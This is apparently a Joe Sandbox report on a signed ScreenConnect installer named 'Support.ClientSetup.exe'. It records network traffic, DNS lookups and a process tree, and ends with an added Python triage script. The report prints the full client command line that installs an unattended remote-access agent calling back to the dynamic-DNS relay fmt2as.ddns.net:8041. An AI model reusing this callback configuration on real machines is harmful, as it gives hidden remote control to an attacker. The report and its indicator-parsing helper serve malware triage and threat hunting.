SHA-512: DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious: false
                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                        Entropy (8bit):7.429446792949428
                                                                                                                                        TrID:
                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                        File name:Support.ClientSetup.exe
                                                                                                                                        File size:5'622'816 bytes
                                                                                                                                        MD5:6b40938a0c9723db144782829b133286
                                                                                                                                        SHA1:4e4e55175aa824d118f6cb20d6883a9c1d4d2a39
                                                                                                                                        SHA256:f6f1bd1f20dc68a6adce415ddb8cc509cd4e1f5435e369467abdd70900000cc3
                                                                                                                                        SHA512:7f52fb59b3d13f057b565e1a6e606f18849b8e0a7e58b03a49408dbbc3c2834c24c48e70061bb52aba93e0d93207f6d1ef5b5c763b488d42540298904700b709
                                                                                                                                        SSDEEP:49152:LEEL5cx5xTkYJkGYYpT0+TFiH7efP8Q1yJJ4ZD1F5z97oL1YbGQ+okRPGHpRPqM8:kEs6efPNwJ4t1h0cG5FGJRPxow8O
                                                                                                                                        TLSH:4446E111B3DA95B9D4BF063CD87A82699A74BC044712C7EF53D4BD2D2D32BC05A323A6
                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........_..E>`.E>`.E>`.....O>`.....?>`.....]>`..Ee.`>`..Ed.T>`..Ec.Q>`.LF..A>`.[l..F>`.E>a.%>`..Ei.D>`..E..D>`..Eb.D>`.RichE>`........
                                                                                                                                        Icon Hash:00928e8e8686b000
                                                                                                                                        Entrypoint:0x4014ad
                                                                                                                                        Entrypoint Section:.text
                                                                                                                                        Digitally signed:true
                                                                                                                                        Imagebase:0x400000
                                                                                                                                        Subsystem:windows gui
                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                        Time Stamp:0x6377E6AC [Fri Nov 18 20:10:20 2022 UTC]
                                                                                                                                        TLS Callbacks:
                                                                                                                                        CLR (.Net) Version:
                                                                                                                                        OS Version Major:5
                                                                                                                                        OS Version Minor:1
                                                                                                                                        File Version Major:5
                                                                                                                                        File Version Minor:1
                                                                                                                                        Subsystem Version Major:5
                                                                                                                                        Subsystem Version Minor:1
                                                                                                                                        Import Hash:9771ee6344923fa220489ab01239bdfd
                                                                                                                                        Signature Valid:true
Signature Issuer: CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error: The operation completed successfully
Error Number: 0
Not Before, Not After
• 17/08/2022 02:00:00 16/08/2025 01:59:59
Subject Chain
• CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
Version: 3
Thumbprint MD5: AAE704EC2810686C3BF7704E660AFB5D
Thumbprint SHA-1: 4C2272FBA7A7380F55E2A424E9E624AEE1C14579
Thumbprint SHA-256: 82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
Serial: 0B9360051BCCF66642998998D5BA97CE
Instruction
call 00007F82350397DAh
jmp 00007F823503928Fh
push ebp
mov ebp, esp
push 00000000h
call dword ptr [0040D040h]
push dword ptr [ebp+08h]
call dword ptr [0040D03Ch]
push C0000409h
call dword ptr [0040D044h]
push eax
call dword ptr [0040D048h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call dword ptr [0040D04Ch]
test eax, eax
je 00007F8235039417h
push 00000002h
pop ecx
int 29h
mov dword ptr [004148D8h], eax
mov dword ptr [004148D4h], ecx
mov dword ptr [004148D0h], edx
mov dword ptr [004148CCh], ebx
mov dword ptr [004148C8h], esi
mov dword ptr [004148C4h], edi
mov word ptr [004148F0h], ss
mov word ptr [004148E4h], cs
mov word ptr [004148C0h], ds
mov word ptr [004148BCh], es
mov word ptr [004148B8h], fs
mov word ptr [004148B4h], gs
pushfd
pop dword ptr [004148E8h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [004148DCh], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [004148E0h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [004148ECh], eax
mov eax, dword ptr [ebp-00000324h]
mov dword ptr [00414828h], 00010001h
Programming Language:
• [IMP] VS2008 SP1 build 30729
• [IMP] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x129c4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x16000 | 0x533074 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x546200 | 0x16a20 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x54a000 | 0xea8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x11f20 | 0x70 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x11e60 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0x13c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xb1af | 0xb200 | d9fa6da0baf4b869720be833223490cb | False | 0.6123156601123596 | data | 6.592039633797327 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xd000 | 0x6078 | 0x6200 | 8b45a1035c0de72f910a75db7749f735 | False | 0.41549744897959184 | data | 4.786621464556291 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x14000 | 0x11e4 | 0x800 | 1f4cc86b6735a74429c9d1feb93e2871 | False | 0.18310546875 | data | 2.265083745848167 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x16000 | 0x533074 | 0x533200 | d813d73373778ed5b0a4b71b252379eb | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x54a000 | 0xea8 | 0x1000 | a93b0f39998e1e69e5944da8c5ff06b1 | False | 0.72265625 | data | 6.301490309336801 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
FILES | 0x163d4 | 0x86000 | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.3962220149253731
FILES | 0x9c3d4 | 0x1a4600 | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.5111589431762695
FILES | 0x2409d4 | 0x1ac00 | PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.4415066442757009
FILES | 0x25b5d4 | 0x2ec318 | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.9810924530029297
FILES | 0x5478ec | 0x1600 | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows | | | 0.3908025568181818
RT_MANIFEST | 0x548eec | 0x188 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5892857142857143
DLL | Import
mscoree.dll | CorBindToRuntimeEx
KERNEL32.dll | GetModuleFileNameA, DecodePointer, SizeofResource, LockResource, LoadLibraryW, LoadResource, FindResourceW, GetProcAddress, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, CreateFileW, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap
OLEAUT32.dll | VariantInit, SafeArrayUnaccessData, SafeArrayCreateVector, SafeArrayDestroy, VariantClear, SafeArrayAccessData
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 4, 2024 20:05:37.031541109 CET | 49707 | 8041 | 192.168.2.17 | 194.59.31.27
Dec 4, 2024 20:05:37.151654959 CET | 8041 | 49707 | 194.59.31.27 | 192.168.2.17
Dec 4, 2024 20:05:37.151762962 CET | 49707 | 8041 | 192.168.2.17 | 194.59.31.27
Dec 4, 2024 20:05:37.429228067 CET | 49707 | 8041 | 192.168.2.17 | 194.59.31.27
Dec 4, 2024 20:05:37.553817987 CET | 8041 | 49707 | 194.59.31.27 | 192.168.2.17
Dec 4, 2024 20:05:38.429847956 CET | 8041 | 49707 | 194.59.31.27 | 192.168.2.17
Dec 4, 2024 20:05:38.484217882 CET | 49707 | 8041 | 192.168.2.17 | 194.59.31.27
Dec 4, 2024 20:05:38.487528086 CET | 49707 | 8041 | 192.168.2.17 | 194.59.31.27
Dec 4, 2024 20:05:38.607389927 CET | 8041 | 49707 | 194.59.31.27 | 192.168.2.17
Dec 4, 2024 20:05:38.972326040 CET | 8041 | 49707 | 194.59.31.27 | 192.168.2.17
Dec 4, 2024 20:05:39.012238979 CET | 49707 | 8041 | 192.168.2.17 | 194.59.31.27
Dec 4, 2024 20:05:39.164134026 CET | 8041 | 49707 | 194.59.31.27 | 192.168.2.17
Dec 4, 2024 20:05:39.222285986 CET | 49707 | 8041 | 192.168.2.17 | 194.59.31.27
Dec 4, 2024 20:05:40.520812988 CET | 49707 | 8041 | 192.168.2.17 | 194.59.31.27
Dec 4, 2024 20:05:40.520903111 CET | 49707 | 8041 | 192.168.2.17 | 194.59.31.27
Dec 4, 2024 20:05:40.640819073 CET | 8041 | 49707 | 194.59.31.27 | 192.168.2.17
Dec 4, 2024 20:05:40.640834093 CET | 8041 | 49707 | 194.59.31.27 | 192.168.2.17
Dec 4, 2024 20:05:40.640899897 CET | 8041 | 49707 | 194.59.31.27 | 192.168.2.17
Dec 4, 2024 20:05:40.640909910 CET | 8041 | 49707 | 194.59.31.27 | 192.168.2.17
Dec 4, 2024 20:05:40.641001940 CET | 8041 | 49707 | 194.59.31.27 | 192.168.2.17
Dec 4, 2024 20:05:40.977624893 CET | 8041 | 49707 | 194.59.31.27 | 192.168.2.17
Dec 4, 2024 20:05:41.021239996 CET | 49707 | 8041 | 192.168.2.17 | 194.59.31.27
Dec 4, 2024 20:06:40.992505074 CET | 49707 | 8041 | 192.168.2.17 | 194.59.31.27
Dec 4, 2024 20:06:41.122241020 CET | 8041 | 49707 | 194.59.31.27 | 192.168.2.17
Dec 4, 2024 20:07:41.123716116 CET | 49707 | 8041 | 192.168.2.17 | 194.59.31.27
Dec 4, 2024 20:07:41.243910074 CET | 8041 | 49707 | 194.59.31.27 | 192.168.2.17
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 4, 2024 20:05:36.747665882 CET | 63870 | 53 | 192.168.2.17 | 1.1.1.1
Dec 4, 2024 20:05:36.995045900 CET | 53 | 63870 | 1.1.1.1 | 192.168.2.17
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 4, 2024 20:05:36.747665882 CET | 192.168.2.17 | 1.1.1.1 | 0xa41e | Standard query (0) | fmt2as.ddns.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 4, 2024 20:05:36.995045900 CET | 1.1.1.1 | 192.168.2.17 | 0xa41e | No error (0) | fmt2as.ddns.net | | 194.59.31.27 | A (IP address) | IN (0x0001) | false
Target ID: 0
Start time: 14:05:30
Start date: 04/12/2024
Path: C:\Users\user\Desktop\Support.ClientSetup.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Support.ClientSetup.exe"
Imagebase: 0xc30000
File size: 5'622'816 bytes
MD5 hash: 6B40938A0C9723DB144782829B133286
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1074872097.0000000005FC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1080490569.0000000007E11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000000.1057907517.0000000000C46000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1069609177.0000000003781000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 2
Start time: 14:05:31
Start date: 04/12/2024
Path: C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\a9232c38f7080cfd\ScreenConnect.ClientSetup.msi"
Imagebase: 0x2f0000
File size: 59'904 bytes
MD5 hash: 9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 14:05:31
Start date: 04/12/2024
Path: C:\Windows\System32\msiexec.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\msiexec.exe /V
Imagebase: 0x7ff659530000
File size: 69'632 bytes
MD5 hash: E5DA170027542E25EDE42FC54C929077
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

                                                                                                                                        Target ID:4
                                                                                                                                        Start time:14:05:31
                                                                                                                                        Start date:04/12/2024
                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 5BDEFC20929AF4DEE946C247B81361C3 C
                                                                                                                                        Imagebase:0x2f0000
                                                                                                                                        File size:59'904 bytes
                                                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:5
                                                                                                                                        Start time:14:05:31
                                                                                                                                        Start date:04/12/2024
                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI7753.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_3897296 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                                                                                        Imagebase:0xd10000
                                                                                                                                        File size:61'440 bytes
                                                                                                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:6
                                                                                                                                        Start time:14:05:34
                                                                                                                                        Start date:04/12/2024
                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding C21885174D7F3F417F2722ACC2A29DD7
                                                                                                                                        Imagebase:0x2f0000
                                                                                                                                        File size:59'904 bytes
                                                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:7
                                                                                                                                        Start time:14:05:34
                                                                                                                                        Start date:04/12/2024
                                                                                                                                        Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding C5E78E314317E5DB1425C419FD0D614F E Global\MSI0000
                                                                                                                                        Imagebase:0x2f0000
                                                                                                                                        File size:59'904 bytes
                                                                                                                                        MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:8
                                                                                                                                        Start time:14:05:34
                                                                                                                                        Start date:04/12/2024
                                                                                                                                        Path:C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:"C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=fmt2as.ddns.net&p=8041&s=02da7a61-8cbe-45ef-aafc-4fc38ad5be40&k=BgIAAACkAABSU0ExAAgAAAEAAQBxzLpqh5koCP8CJbkkTCK5cqKcoz1K1JPBKGOoX2UntNEa0kbsjdHiHm6awC3b94Odgxip4bb3WZtV%2bJZdrEVSNJWv79YSvcWZT5y1UoPQ5ERCoZiQ9tchHj%2fdfQKGhg%2fdKH8J%2bRVDSV1rscnVOsc6DRlnVqJ%2bN3R4mz%2fwWIr4LXHocknsHhcSdO6lbQtdrPsiR%2fwv9GaUXfgI2d%2bsP4RrrBfAKpm2cyrPiMcHkEa3AHKqY3OM2oXN5%2bJcDFS6u9VisBMF5vwQJoGDG1GYkn2BCkN6fQQkj8QoHa84KuId00fcEP90jRiW7auJprFFF09vlWeqobl%2bXErI6rnKx3nZ&c=Online&c=Online&c=Online&c=&c=&c=&c=&c="
                                                                                                                                        Imagebase:0xa0000
                                                                                                                                        File size:95'512 bytes
                                                                                                                                        MD5 hash:75B21D04C69128A7230A0998086B61AA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Antivirus matches:
                                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                                        Reputation:moderate
                                                                                                                                        Has exited:false
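
The quoted argument string handed to ScreenConnect.ClientService.exe above is the whole client configuration: relay host (h), relay port (p), session type (e), session GUID (s) and the relay's RSA public key (k), which is a base64 CryptoAPI PUBLICKEYBLOB. The Python below is an added triage helper, not part of the Joe Sandbox report and not ScreenConnect code; it parses that command line (copied from Target ID 8), decodes the key header, fingerprints the key so the same relay can be matched across other samples, and flags the dynamic-DNS host. The dynamic-DNS zone list and the statement that 8041 is the product's default relay port are assumptions of this example.

```python
"""Added triage helper (not Joe Sandbox or ScreenConnect code) for a captured
ScreenConnect client command line such as Target ID 8 above."""
import base64
import hashlib
import re
import struct
from urllib.parse import parse_qs

# Command line recorded for Target ID 8 in the report (copied verbatim).
SAMPLE_CMDLINE = (
    '"C:\\Program Files (x86)\\ScreenConnect Client (a9232c38f7080cfd)\\ScreenConnect.ClientService.exe" '
    '"?e=Access&y=Guest&h=fmt2as.ddns.net&p=8041&s=02da7a61-8cbe-45ef-aafc-4fc38ad5be40'
    '&k=BgIAAACkAABSU0ExAAgAAAEAAQBxzLpqh5koCP8CJbkkTCK5cqKcoz1K1JPBKGOoX2UntNEa0kbsjdHi'
    'Hm6awC3b94Odgxip4bb3WZtV%2bJZdrEVSNJWv79YSvcWZT5y1UoPQ5ERCoZiQ9tchHj%2fdfQKGhg%2fdKH8J'
    '%2bRVDSV1rscnVOsc6DRlnVqJ%2bN3R4mz%2fwWIr4LXHocknsHhcSdO6lbQtdrPsiR%2fwv9GaUXfgI2d'
    '%2bsP4RrrBfAKpm2cyrPiMcHkEa3AHKqY3OM2oXN5%2bJcDFS6u9VisBMF5vwQJoGDG1GYkn2BCkN6fQQkj8QoHa84'
    'KuId00fcEP90jRiW7auJprFFF09vlWeqobl%2bXErI6rnKx3nZ'
    '&c=Online&c=Online&c=Online&c=&c=&c=&c=&c="'
)

# Assumed list of free dynamic-DNS zones; ddns.net is the one seen in this report.
DYNAMIC_DNS_ZONES = ("ddns.net", "no-ip.org", "no-ip.com", "duckdns.org", "hopto.org", "zapto.org")
DEFAULT_RELAY_PORT = 8041   # assumption: ScreenConnect's default relay port
CALG_RSA_KEYX = 0xA400      # CryptoAPI algorithm id expected in the blob header


def extract_query(cmdline: str) -> str:
    """Return the quoted "?..." argument without the surrounding quotes and the '?'."""
    start = cmdline.find('"?')
    if start < 0:
        raise ValueError("no ScreenConnect argument string in command line")
    end = cmdline.find('"', start + 1)
    return cmdline[start + 2:end]


def in_dynamic_dns_zone(host: str) -> bool:
    """Exact zone or subdomain match only, so 'xddns.net' does not count."""
    host = host.lower().rstrip(".")
    return any(host == z or host.endswith("." + z) for z in DYNAMIC_DNS_ZONES)


def parse_capi_rsa_public_blob(blob: bytes) -> dict:
    """Decode a CryptoAPI PUBLICKEYBLOB: BLOBHEADER, RSAPUBKEY, little-endian modulus."""
    b_type, b_version, _reserved, alg_id = struct.unpack_from("<BBHI", blob, 0)
    magic, bit_len, pub_exp = struct.unpack_from("<4sII", blob, 8)
    if b_type != 6 or magic != b"RSA1":          # 6 == PUBLICKEYBLOB
        raise ValueError("not an RSA PUBLICKEYBLOB")
    modulus = int.from_bytes(blob[20:20 + bit_len // 8], "little")
    return {
        "version": b_version,
        "alg_id": alg_id,
        "bit_len": bit_len,
        "pub_exp": pub_exp,
        "modulus": modulus,
        # Stable pivot value for "which relay server is this"; SHA-256 of the raw blob.
        "fingerprint": hashlib.sha256(blob).hexdigest()[:16],
    }


def triage(cmdline: str) -> dict:
    """Parse the client argument string and return the fields an analyst pivots on."""
    q = parse_qs(extract_query(cmdline), keep_blank_values=True)

    def first(name: str) -> str:
        return q.get(name, [""])[0]

    host = first("h").lower()
    port = int(first("p") or 0)
    key_b64 = first("k")   # parse_qs has already turned %2b/%2f back into + and /
    key = parse_capi_rsa_public_blob(base64.b64decode(key_b64 + "=" * (-len(key_b64) % 4)))
    m = re.search(r"ScreenConnect Client \(([0-9a-f]{16})\)", cmdline)

    findings = []
    if first("e") == "Access":
        findings.append("e=Access: unattended access agent, not an on-demand support session")
    if in_dynamic_dns_zone(host):
        findings.append(f"relay host {host} sits in a dynamic-DNS zone")
    if port != DEFAULT_RELAY_PORT:
        findings.append(f"relay port {port} differs from the assumed default {DEFAULT_RELAY_PORT}")
    if key["alg_id"] != CALG_RSA_KEYX:
        findings.append(f"unexpected key algorithm id {key['alg_id']:#x}")

    return {
        "host": host, "port": port,
        "session_type": first("e"), "process_type": first("y"), "session_id": first("s"),
        "instance": m.group(1) if m else "",
        "custom_properties": q.get("c", []),
        "key": key, "dynamic_dns": in_dynamic_dns_zone(host), "findings": findings,
    }


if __name__ == "__main__":
    r = triage(SAMPLE_CMDLINE)
    print(f"relay {r['host']}:{r['port']} session={r['session_type']} instance={r['instance']}")
    print(f"key RSA-{r['key']['bit_len']} e={r['key']['pub_exp']} fp={r['key']['fingerprint']}")
    for f in r["findings"]:
        print(" -", f)
```

The key fingerprint is the most durable pivot: an operator can re-register a new dynamic-DNS name or port in minutes, but every client built by the same ScreenConnect server carries the same relay public key, so hunting on the fingerprint across a malware corpus groups samples by the server behind them.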

                                                                                                                                        Target ID:9
                                                                                                                                        Start time:14:05:35
                                                                                                                                        Start date:04/12/2024
                                                                                                                                        Path:C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:"C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe" "RunRole" "24be1ff4-4556-4f6e-bdeb-6bf05204e79c" "User"
                                                                                                                                        Imagebase:0x8d0000
                                                                                                                                        File size:602'392 bytes
                                                                                                                                        MD5 hash:1778204A8C3BC2B8E5E4194EDBAF7135
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000000.1114992384.00000000008D2000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.2321217327.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                        Antivirus matches:
                                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                                        Reputation:moderate
                                                                                                                                        Has exited:false

                                                                                                                                        Target ID:11
                                                                                                                                        Start time:14:05:38
                                                                                                                                        Start date:04/12/2024
                                                                                                                                        Path:C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:"C:\Program Files (x86)\ScreenConnect Client (a9232c38f7080cfd)\ScreenConnect.WindowsClient.exe" "RunRole" "3473749a-8727-4cb2-bb44-83e8e8d9f56c" "System"
                                                                                                                                        Imagebase:0xfc0000
                                                                                                                                        File size:602'392 bytes
                                                                                                                                        MD5 hash:1778204A8C3BC2B8E5E4194EDBAF7135
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000B.00000002.1160978410.0000000003461000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        Reputation:moderate
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:12
                                                                                                                                        Start time:14:05:44
                                                                                                                                        Start date:04/12/2024
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                        Imagebase:0x7ff7ca9b0000
                                                                                                                                        File size:55'320 bytes
                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high
                                                                                                                                        Has exited:false

                                                                                                                                        Target ID:13
                                                                                                                                        Start time:14:05:51
                                                                                                                                        Start date:04/12/2024
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                                                                        Imagebase:0x7ff7ca9b0000
                                                                                                                                        File size:55'320 bytes
                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Has exited:true

                                                                                                                                        Target ID:14
                                                                                                                                        Start time:14:05:51
                                                                                                                                        Start date:04/12/2024
                                                                                                                                        Path:C:\Windows\System32\SgrmBroker.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\SgrmBroker.exe
